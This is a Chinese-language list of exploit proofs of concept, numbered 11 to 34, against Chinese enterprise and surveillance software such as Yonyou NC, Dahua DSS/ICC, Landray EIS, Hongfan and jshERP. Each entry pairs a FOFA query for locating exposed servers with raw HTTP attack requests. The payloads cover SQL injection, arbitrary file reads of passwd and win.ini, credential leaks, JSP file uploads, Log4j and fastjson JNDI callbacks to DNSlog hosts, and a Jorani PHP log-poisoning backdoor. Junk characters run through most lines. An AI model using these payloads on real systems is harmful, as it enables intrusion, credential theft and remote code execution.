$ r1 [) G' h8 e) p- [2 N, ^% c11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
; P$ \$ N; L& R0 n% S9 vFOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"8 p* C' g4 q2 u! t% Q4 [; ?
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
, H( X& x2 k* i0 Y% zHost: 127.0.0.1/ E2 \0 t) D. J6 O! }
Pragma: no-cache( t/ c! \4 E# e4 {! E
Cache-Control: no-cache8 i2 _# H) _: d* v
Upgrade-Insecure-Requests: 1
' z+ V5 [. C4 b& J$ ]- s) vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36( z5 ^% t, {  l) E& M5 j9 [
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7. p- C1 K7 R' G0 w9 W8 r
Accept-Encoding: gzip, deflate( q2 i- O7 J2 X" F
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
+ H1 q; x$ V3 Z* ~( K0 E' EConnection: close
! Z. e& f5 a2 y, ?, E' B4 X8 n5 c% ^+ a
% y2 y3 I* N. M" H0 a5 G& Y
12. Jorani < 1.0.2 远程命令执行
  e/ I5 u6 L5 gFOFA:title="Jorani"5 ~- q" g6 d2 z, ^6 _. U1 e
第一步先拿到cookie4 `  j9 W0 m3 L0 W
GET /session/login HTTP/1.1, l* M  s9 V8 F
Host: 192.168.190.30
+ t1 H8 w, g" }4 S+ YUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
( X7 ~- W8 C& D3 z) b2 sConnection: close
1 I9 v3 R9 r1 q$ C& `Accept-Encoding: gzip
7 v8 @( Y( J' Z+ Y, r2 \( v, C2 G& V! w

9 u" r2 M2 t  M6 x9 s$ n响应中csrf_cookie_jorani用于后续请求1 o0 P* v6 k- V. m, ?8 `
HTTP/1.1 200 OK0 \& Y/ O3 I( \  ]  [
Connection: close
# ]" \6 q- }+ c; R; {1 a. H: tCache-Control: no-store, no-cache, must-revalidate# _6 A- S# M+ ~2 H  S3 M
Content-Type: text/html; charset=UTF-8
4 s) c! O$ G$ HDate: Tue, 24 Oct 2023 09:34:28 GMT% Z; L2 Q% Y! k1 R: i
Expires: Thu, 19 Nov 1981 08:52:00 GMT
& H' w6 H$ A0 R8 l0 _! X9 }; ALast-Modified: Tue, 24 Oct 2023 09:34:28 GMT
# R0 \' l* I6 }& f1 S& j! JPragma: no-cache
0 s3 w  I* ]8 N$ H$ t+ s/ gServer: Apache/2.4.54 (Debian)
- p$ _7 n& t: FSet-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/5 C$ ^; o+ h) o/ y
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly* k7 A% O& d1 [6 Y5 c6 L% W
Vary: Accept-Encoding
3 E$ _# Z" x* p
& @: ^0 K+ |5 w) j
8 C, ~3 R* I7 _4 }& |$ @POST请求,执行函数并进行base64编码6 {4 L2 Q1 k2 i. a) ?& ?. u
POST /session/login HTTP/1.15 `$ h) ?8 ^, Y6 u1 Z( J* j2 s
Host: 192.168.190.30! B# q+ l, v+ ^- k* f% [
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.360 |6 T8 s3 X/ r, H+ Z( q
Connection: close& l3 j  ?$ J# H3 |
Content-Length: 252, Q% g4 V3 W$ |
Content-Type: application/x-www-form-urlencoded! v! x6 u# Z) c0 f" ]# G
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
; ~) e3 R" [/ Z& N0 uAccept-Encoding: gzip
2 ~; _) O6 ]/ `2 v+ T+ r9 V3 z1 I: d( p  r* l
csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
5 c1 ^* ]3 ~4 X  ~' C# P
; j- g! r) M7 ]* e
, a+ d: e* P% k  h, W1 n& d2 r  y* O) P
向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串/ w! v# k, m' F" @1 V7 A! e
GET /pages/view/log-2023-10-24 HTTP/1.1% U0 T: b; [6 b( D5 G- C
Host: 192.168.190.302 B9 T) J; o3 l4 e5 Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
4 d8 ]* U, E$ W' u) L  BConnection: close  a: p+ G2 {# G8 M5 w. A1 i7 z
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
8 \" t- A: [! V) |0 o6 [$ k9 DK1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
! [" O5 \) W+ b$ Y1 X" OX-REQUESTED-WITH: XMLHttpRequest
- ?" R5 c( I* pAccept-Encoding: gzip& Q; L5 D) `) J- I% C/ r& G' M& M
0 l* u' U) F0 x4 o
3 C' a5 [4 X7 P& B  e* _( \# @
13. 红帆iOffice ioFileDown任意文件读取7 _% N8 O$ z5 r: [5 m
FOFA:app="红帆-ioffice"
% p- m( i- J" ]7 n/ }' YGET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.11 E$ R5 y8 e% q3 T3 v
Host: x.x.x.x
* K$ C4 E. l5 l- s* h  X8 w" @& B' hUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36) [. x% y; i& h( p* l: S7 D+ E
Connection: close/ ]# K5 D3 c$ w% x! \8 p
Accept: */*
( g4 |( K0 ]) o5 @2 mAccept-Encoding: gzip+ F' i' B0 L" }/ a1 |) _

" P" x6 R, {+ W8 w5 R
% P# k( t6 E2 d8 O8 E14. 华夏ERP(jshERP)敏感信息泄露  k* U+ n4 |; X5 W
FOFA:body="jshERP-boot"7 K( g2 i# d9 W9 }
泄露内容包括用户名密码2 ^/ K: u+ f9 t6 @7 `
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
: D3 A# o& j+ \* q. _Host: x.x.x.x. {! ], F6 @3 x6 p
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
4 a+ j' H9 x: s- CConnection: close
; ]: o% x# z2 VAccept: */*% m  [$ M2 m8 u
Accept-Language: en$ G: i. [3 H6 \( x0 P7 \
Accept-Encoding: gzip) X0 [2 P0 |6 N
7 {' |7 e8 j& w& |4 I4 R
' A* ?# W% ]' @# K
15. 华夏ERP getAllList信息泄露
2 @. d1 e* D3 ?+ |& u" ?CVE-2024-0490
' w& i+ w7 y7 {6 \* i9 l( N' ZFOFA:body="jshERP-boot": L' d' M+ p& W. z( J; V( Q# v
泄露内容包括用户名密码
: P# x, K, @  H: {) r& }" }GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
7 Z1 C8 `4 @  W9 S/ v+ fHost: 192.168.40.130:1007 C+ D4 E7 _- p! X; _
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
  B2 r5 X8 F- c" W% ]' {) [Connection: close0 Q2 I) y+ W2 [$ A: Z. p; L
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
1 S2 Z0 J9 |7 b2 XAccept-Language: en
3 ]5 g) S# E: d* Q# ~sec-ch-ua-platform: Windows
# t0 d- U$ O: h- g1 ]; f7 c- B" BAccept-Encoding: gzip6 Y& P8 e5 Z& m# y9 H6 C

4 Q5 j) y7 x1 f  ^* _
' \# P2 {( t1 g! D, z& ^* _* Y16.  红帆HFOffice医微云SQL注入
( Z6 P) O1 M1 O7 v" m7 k3 z6 oFOFA:title="HFOffice"% D3 j5 O4 D& b
poc中调用函数计算1234的md5值
6 _. I# @% Q$ t2 T/ J( S. \6 T  e! bGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
, V+ ?# o  Z; U- \1 H# YHost: x.x.x.x# o$ ^6 ~: L4 @  ?4 g
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36# e' P" I/ k; s! e; f
Connection: close
4 f2 |  e3 b! Z8 G9 BAccept: */*
4 z# j" V$ i& v: kAccept-Language: en
3 p! i8 |/ _: P& B+ \Accept-Encoding: gzip
* h: W- w$ |+ u; _+ g" G, e- {5 l& K' H& T9 z% H! h0 S
3 z" v, o6 N6 f( U
17. 大华 DSS itcBulletin SQL 注入5 U- _$ M; @7 ^/ B
FOFA:app="dahua-DSS"7 ^$ g, T- H( ?0 y9 u. u1 k
POST /portal/services/itcBulletin?wsdl HTTP/1.1: {* ]+ h5 h; f8 B; S
Host: x.x.x.x
  U; t! F+ C3 w, I2 aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
# j3 X: l5 }# i4 k- ]Connection: close
+ n: w9 @! s' t4 J; hContent-Length: 345; N- |5 \" |7 ]: Z5 z: _
Accept-Encoding: gzip5 H( O3 e2 }* c+ j
# P- m/ E- X' l& {3 e. O
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>8 X/ n! r. Y/ e; h1 Q
<s11:Body>
1 F# N0 |5 F' Y6 ?# o% e4 B    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
7 {7 i8 R' m1 u9 v8 f      <netMarkings>
$ }* J  I  O# ^0 B       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
) V) V( x: r1 O9 U! w      </netMarkings>2 O5 {) X  ^5 Y( j: K* z
    </ns1:deleteBulletin>$ b2 o6 b! y6 @: |: ~: t4 J
  </s11:Body>4 H& i8 T% J5 d* b: K2 ^! m+ l! ~! ?  K
</s11:Envelope>; B9 B; T1 w4 v; w# D1 T/ Y7 o
$ u0 d! N0 {9 e6 _  K9 }- B/ O2 }

* k( b& c7 c1 G* v/ z4 G18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
5 u/ k/ U3 e7 R2 ^FOFA:app="dahua-DSS"
& k, k+ N2 _1 }3 E9 ~9 _$ m' GGET /admin/cascade_/user_edit.action?id=1 HTTP/1.19 J7 o5 D1 J+ [: X
Host: your-ip' Y) {* M+ ^+ H  \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36/ |+ z/ m! n1 J: N9 e
Accept-Encoding: gzip, deflate4 K3 D% a  Z9 v/ m, R' H( o
Accept: */*) R7 q( f  G! O
Connection: keep-alive' R( L$ }$ p0 _6 J% H

  }& `' T# {" ?4 H- I! [, r; T7 c9 P; _0 t1 ~' O2 {: E: \  d9 N
# S$ H$ t- W0 _' ]. b7 d* b6 I
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
7 Z) x, n" m  j4 I2 k( V" [FOFA:app="dahua-DSS"
/ W& W* Q) `( f* y. |9 v2 I5 e8 gGET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.18 e" R6 e. ^* l. L+ Q' ^
Host:, D6 c4 B) n9 S/ e+ }+ \) @
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
4 M7 @+ a% q2 aAccept-Encoding: gzip, deflate
5 w1 w8 v. y. @: ^; ZAccept: */*  F: ?3 k# a+ @
Connection: keep-alive9 Z: E2 o) d) Y/ m8 V

4 T- ~- |9 T- o3 R  K8 C. o" b' D4 b: s" `6 J
20. 大华ICC智能物联综合管理平台任意文件读取
' A: e$ S* c4 m& F5 x. Y* f& P/ TFOFA:body="*客户端会小于800*"
) Y9 L$ I) i& nGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.10 K  {) v" N6 }6 {/ Y* C% G
Host: x.x.x.x
1 K. ]" [* ^. o: vUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
  ~- e4 {2 O  |) w% bConnection: close0 {6 d( u! q& q; [, C
Accept: */*
! c  M# b: m6 a* {! i4 @& RAccept-Language: en! j( F) z  e% Y6 N
Accept-Encoding: gzip
8 A2 E/ Y" d3 I2 I3 g' u- m- L. d* D( D; k

$ s  G! _( r! J1 |- N; W21. 大华ICC智能物联综合管理平台random远程代码执行; O5 ?) @* ~! X- N2 j8 p
FOFA:icon_hash="-1935899595"
3 I- j" A/ k3 {! R) h+ o, @POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1- Z) V. Q4 C4 E1 P8 G! d; g
Host: x.x.x.x+ [0 [5 o+ {' n! n
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15) d8 [' ]& {$ \- f: U: s
Content-Length: 161% r* e) M0 W- G* W3 [0 P
Accept-Encoding: gzip0 q- M! D0 c) A2 _- E
Connection: close3 e+ v# i( f" Z& N- y$ i5 i
Content-Type: application/json;charset=utf-8
' Q5 [+ D0 `  y9 ?: u& a; \/ m0 K+ @+ ~
{6 Y( b! B1 t3 s5 I/ e
"a":{6 _. \& B% H  F& u- U
   "@type":"com.alibaba.fastjson.JSONObject",
1 ]" t6 Q+ j- I7 K8 S% n+ M    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}2 P" f5 T  y7 \7 n+ E( u
  }""
+ U) {; _) y$ ~# @0 O3 G}; D% U5 h& X& S. I1 o% `  u7 ?$ H) ?

  {) G- |$ j6 r- n4 j6 V6 s; |' W, \. F$ m3 [( }
22. 大华ICC智能物联综合管理平台 log4j远程代码执行0 a0 R7 l# R7 B$ n1 s& k
FOFA:icon_hash="-1935899595"
% w& Q9 r) h* T& p( cPOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1# z: K/ Q- C% ^! V
Host: your-ip
- g% G+ |* P  q# _; w3 ^% fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.360 N7 ?4 l+ v, [7 ]4 i  ~* `  k6 z
Content-Type: application/json;charset=utf-89 A- b; q# e. K- \

$ Z( d6 G; ?4 R& D2 \2 X# ~{
* c) m( \) t( F) J. ^& a) j"loginName":"${jndi:ldap://dnslog}"3 n9 U( T  U: r0 ~
}
( N7 \1 P# h' J$ ]. _/ ~$ ~3 ]" e9 c- q

7 [8 ^8 K' K9 I& M" I5 u. X& B1 w- E. c/ `
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行5 l6 t8 u* ^& U
FOFA:icon_hash="-1935899595"
+ G8 |2 y4 Z1 R6 L( g; [5 L, }POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.18 t( k- Y: N' ]4 e6 Y* d
Host: your-ip
+ T: X" Q) \2 b( f9 YUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15# U; t; |! {( F/ E# u2 ?# b% ^$ X/ H5 W
Content-Type: application/json;charset=utf-8' {: @) ^6 s. Z6 v
Accept-Encoding: gzip
$ B- z9 O/ p/ _+ z& |( n' W  b) ~2 e+ SConnection: close1 D9 p- `( ?% P/ X5 i
' O9 e5 g! R; r
{1 @$ \( y- @7 L' ]
    "a":{2 H+ j6 L( V, x
        "@type":"com.alibaba.fastjson.JSONObject",8 b# ^/ E0 g1 x( e* m! v/ n
       {"@type":"java.net.URL","val":"http://DNSLOG"}7 V/ |. ?# [8 f& C4 Z3 Q
        }""8 M2 T" h" h% [; O4 {, n
}
/ N; o5 D# F  z: T+ q0 i" L4 }$ E+ J& k

8 F: S1 x' n% ]& a0 Q5 g* P3 k24. 用友NC 6.5 accept.jsp任意文件上传
0 Y& C3 D# J7 GFOFA:icon_hash="1085941792"
) h0 K  t. m, k8 q6 xPOST /aim/equipmap/accept.jsp HTTP/1.1
0 M' W: |! Q" X1 @0 }/ ZHost: x.x.x.x
' e! m; C0 d0 j( RUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36( P( `; ^5 d2 m
Connection: close
8 \9 f# z2 D% z, L3 S) Q4 z( WContent-Length: 449
$ e; {' A6 ]2 ZAccept: */*( c+ |9 f! x$ A" t4 B' k: J3 j) \
Accept-Encoding: gzip! F. S! R) P/ I+ l% n) ^  s
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
. A; U" O. L7 m
# X0 B: \7 c$ g) D( ]6 e-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc5 h% n& o  V( G7 b! b, O' O
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
: d4 B& r6 v$ zContent-Type: text/plain
) k$ j, W& P# t$ ~8 O, }
4 h$ A* e' Y! O<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
8 P; Y* `8 C9 E-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc! ~! h( Y& \( t* E6 P
Content-Disposition: form-data; name="fname"- Y" s! A+ g! X+ s: ~$ q
% w" Z1 c! y9 b) v
\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp# r' Q' h, G* P
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--8 ]* ^. t$ M  s

2 ?7 ?/ s4 w/ c9 n7 f; W2 v  ?9 @6 g' L: r: j' `. L' @  D0 |
25. 用友NC registerServlet JNDI 远程代码执行% X" o2 f5 ^; v
FOFA:app="用友-UFIDA-NC"
$ V2 y9 u3 `* R, X3 a2 \POST /portal/registerServlet HTTP/1.12 B7 z% G$ U& N  [) d3 Y
Host: your-ip
* H; a& t! B+ }" m3 x7 hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
$ M1 ^5 Y4 M9 N" ^0 M- J4 xAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
9 e- z# N2 ]# u$ Z( ~* vAccept-Encoding: gzip, deflate
) @! Z( O) }( N8 H# mAccept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
, q/ s3 `- Q* m9 {5 hContent-Type: application/x-www-form-urlencoded; A6 S/ x: ^6 ]( s% L% p3 j- G
, @4 V7 e+ d: Q4 m4 d
type=1&dsname=ldap://dnslog5 R) X8 F7 c& x3 c
" e7 W8 }1 K4 G$ c, t) _! `0 s/ w

0 d5 M  D* a% G# ]# x7 ^1 z) H4 c) ~% O" ?4 N% ^* a" y% Z
26. 用友NC linkVoucher SQL注入
* ]6 v! m; h0 EFOFA:app="用友-UFIDA-NC". a& j* B. V" U+ ]9 h4 o
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1& i( c, `3 L4 H6 Q
Host: your-ip
1 V: T  w: r0 O1 S2 `* E; i( CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
" B1 F% a: C' K4 q1 O1 o( I7 jContent-Type: application/x-www-form-urlencoded" C4 Z9 V* M/ b
Accept-Encoding: gzip, deflate9 ~5 C1 d! b- x8 R5 h9 z
Accept: */*( O9 }: l0 C9 [& s
Connection: keep-alive: o) W# ?, Y6 B% s

- `' V  A' Z% p1 T( g& B0 _
% E4 E8 ?6 s; w4 [27. 用友 NC showcontent SQL注入
. n& @: k- L4 j# D9 d# @4 Z: qFOFA:icon_hash="1085941792", g* S7 D: p2 p8 m
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.10 ]$ N) ?' `8 k: k
Host: your-ip& z% O  a3 s' j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.364 o* a- i7 k3 N* P. K/ G( m9 u
Accept-Encoding: identity
( I; n7 i0 Q+ ]! [5 F2 _5 w2 c4 ]5 OConnection: close
* e; J/ J: j/ A( Q! i) x1 rContent-Type: text/xml; charset=utf-8
# n, u4 w5 x) @* j5 d
6 [; j( h: t, C/ z+ D
; T9 t* A0 \$ H+ I6 p8 d28. 用友NC grouptemplet 任意文件上传
  S0 F' N1 _* q5 D/ n% Y' zFOFA:icon_hash="1085941792"
" Q9 T( ^* a0 N" q) g! WPOST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
0 S6 V! o5 m4 A5 i, _3 M# s% wHost: x.x.x.x
% H& s$ B0 w: X; p/ oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.360 g. z- {! |% P9 s0 Z) `8 \
Connection: close! |0 h, r2 k' W0 N+ G; F6 X, |3 r
Content-Length: 268% A  Y& W9 h* B6 g! t+ `/ p
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
1 l& x' i% U# }- K, DAccept-Encoding: gzip
* n) Z. l8 a+ G( H3 l& F" }1 T1 o6 j3 A0 W, |% J
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
8 @$ T8 N# Y+ G/ }Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
& f& M! |* C6 [+ e8 [Content-Type: application/octet-stream
1 O2 A" x7 k1 c  e- a( x' ?. B- z( ]0 I6 E  ?
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
1 j* [4 d& j' s4 r------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--
4 y8 w6 p- j/ o# K; n2 l0 I" r: w. r, U; }, E

5 ]* Q: x+ A$ k7 m5 ]+ x+ Q2 x/uapim/static/pages/nc/head.jsp( i, ?! L/ A1 A" x0 `! J  T) N4 Q* U
* |; {- ^. M4 |# c; [* b% F8 j
29. 用友NC down/bill SQL注入) e; r% E. r; s: H: z& y/ ?
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"3 t3 l4 \' i4 V1 @# B
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
6 h% y6 u! W6 V: p. yHost: your-ip; u! B8 q! j, E7 D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36. H  n3 n0 O! w2 E- ]: B& G( f
Content-Type: application/x-www-form-urlencoded, x$ c( p( [# ]( |
Accept-Encoding: gzip, deflate& x1 G3 e4 q/ K$ J8 m
Accept: */*% s" p4 v8 n6 Q7 K8 A- a7 V% ?; V: G
Connection: keep-alive
9 z: i$ F: I) A: F) [$ P: Z  C( _$ O6 [& q& ~/ G8 t" g

# k7 L0 E) b8 j30. 用友NC importPml SQL注入
" X9 z) I" @- Y# SFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
7 [' g: z/ p$ g; ~POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1, m# h( d. Q5 U# B: `2 e0 P6 K8 O
Host: your-ip
4 a# W! E' e1 [- tContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V7 Y$ W" }, C1 V# b% ]  C6 @; F) N/ g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36, g# @0 d9 }  D6 L
Connection: close8 I3 l- @7 V* c5 P/ T, v6 T3 N0 l

- c0 M& p# }. L7 @' a* Y------WebKitFormBoundaryH970hbttBhoCyj9V! K( i5 v2 I' K$ r  B8 U; H
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"+ b1 i6 \7 p7 x1 p
Content-Type: image/jpeg
: U* K8 q( K" R------WebKitFormBoundaryH970hbttBhoCyj9V--! x% T# R, ^, h/ F

4 C2 w) s  i2 S# v- _- j3 M+ e) H& y* l. c  T; e9 g
31. 用友NC runStateServlet SQL注入
. C7 B8 S2 |# L, r# q, s: @' iversion<=6.5
0 Q& C2 E6 L4 i1 ~1 P4 q, b: GFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
  R# Y( r: {. I% KGET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1( a1 W# p  L6 H& T9 _
Host: host
. X  H# c* t- k. \0 lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36, y5 U  h  o5 ?9 s0 L# E! g
Content-Type: application/x-www-form-urlencoded
% n# N+ r9 H: }3 U2 ~( s, W& s
; V0 S/ ?+ D! A2 g/ Y' o. [, Z1 C4 ?3 P
32. 用友NC complainbilldetail SQL注入
8 h+ L' B, n  @' s' Uversion= NC633、NC65
+ q( ~  C/ L+ T; F+ [FOFA:app="用友-UFIDA-NC"' g$ {" l1 O! E- h3 \; C$ ^/ |
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1% Z- Y2 Z: V  ]$ [7 j0 d
Host: your-ip
( Y; R! t6 S9 x5 T  v# b4 v8 l! _7 M0 AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
0 [! }$ S8 i6 Y8 iContent-Type: application/x-www-form-urlencoded
! h4 A! |, ?, I, f+ W; ]Accept-Encoding: gzip, deflate) ]; ]: l% W% \2 T/ Y1 n" f) ]9 _
Accept: */*
8 Q; ]9 A$ t0 e" R' _" lConnection: keep-alive
0 o$ u8 E; k' G0 @# X  G8 m4 x. b2 \, c! P% J- s
4 B, P+ a& u0 i
33. 用友NC downTax/download SQL注入
6 U2 p, H3 N  ]( zversion:NC6.5FOFA:app="用友-UFIDA-NC": ]: r% O% n) A! C) C8 T5 X
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
% P+ x' F9 ?2 B0 `9 w: j# vHost: your-ip
$ Z( A. g" u$ S) h/ |5 VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36! S( e& F- A5 C& Y
Content-Type: application/x-www-form-urlencoded- T: d8 J4 z4 \3 T! }( \
Accept-Encoding: gzip, deflate
# m+ n( |7 u+ c0 I6 X$ YAccept: */*
$ U. n+ X' r2 Y. K7 ZConnection: keep-alive$ p* U1 k3 ]" V/ k
% M; M9 b! s% V/ |) @
" B; K: C3 e& P/ C% O* Y1 I" o( o" D
34. 用友NC warningDetailInfo接口SQL注入
) ?: D) |+ t6 z& H1 b- D1 `FOFA:app="用友-UFIDA-NC"
7 Y  K5 w- _: g2 P7 H& [2 d( n7 iGET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.16 H5 W. q2 n9 a! m3 V
Host: your-ip2 B- M1 ]) d9 e/ c' e5 U$ N2 [/ i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36; c5 e" s& \9 W; x' J
Content-Type: application/x-www-form-urlencoded
8 w- W  A. {' Q. N$ p2 _Accept-Encoding: gzip, deflate  V/ `8 R. z3 }1 R. a2 F
